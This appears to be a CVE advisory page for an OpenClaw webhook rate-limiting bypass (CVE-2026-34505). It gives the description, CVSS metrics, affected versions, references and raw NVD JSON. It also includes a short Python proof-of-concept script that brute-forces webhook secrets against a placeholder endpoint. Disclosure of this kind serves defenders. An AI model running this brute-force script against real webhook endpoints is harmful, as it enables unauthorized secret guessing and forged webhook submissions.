CVE-2026-34505

Description

OpenClaw before 2026.3.12 applies rate limiting only after successful webhook authentication, allowing attackers to bypass rate limits and brute-force webhook secrets. Attackers can submit repeated authentication requests with invalid secrets without triggering rate limit responses, enabling systematic secret guessing and subsequent forged webhook submission.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.3.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target OpenClaw webhook endpoint
target_url = "http://target-openclaw-instance.com/api/webhook"

# Common secret candidates for brute force
secrets = ["secret123", "admin_key", "webhook_secret", "password", "api_key_2026"]

headers = {
    "Content-Type": "application/json",
    "User-Agent": "CVE-2026-34505-POC"
}

print("[*] Starting brute force attack on webhook endpoint...")

for secret in secrets:
    # Payload simulating a webhook delivery
    payload = {
        "secret": secret,
        "event": "push",
        "data": "malicious_payload"
    }

    try:
        # Send request
        response = requests.post(target_url, json=payload, headers=headers, timeout=5)

        # Check response
        if response.status_code == 200:
            print(f"[+] SUCCESS! Valid secret found: {secret}")
            print(f"[+] Response: {response.text}")
            break
        elif response.status_code == 401 or response.status_code == 403:
            print(f"[-] Failed: {secret} (Status: {response.status_code})")
            # In this vulnerability, we expect no rate limiting (429) here
        elif response.status_code == 429:
            print("[!] Rate limit detected. Vulnerability might be patched.")
            break
        else:
            print(f"[?] Unexpected status code: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34505
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34505
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34505/
[4] VulDB https://vuldb.com/cve/CVE-2026-34505
[5] https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c
[6] https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34505", "sourceIdentifier": "[email protected]", "published": "2026-03-31T12:16:30.237", "lastModified": "2026-04-02T12:22:44.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.12 applies rate limiting only after successful webhook authentication, allowing attackers to bypass rate limits and brute-force webhook secrets. Attackers can submit repeated authentication requests with invalid secrets without triggering rate limit responses, enabling systematic secret guessing and subsequent forged webhook submission."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.12", "matchCriteriaId": "B90EC1D8-4E2B-46AF-8E66-B689693A16CE"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}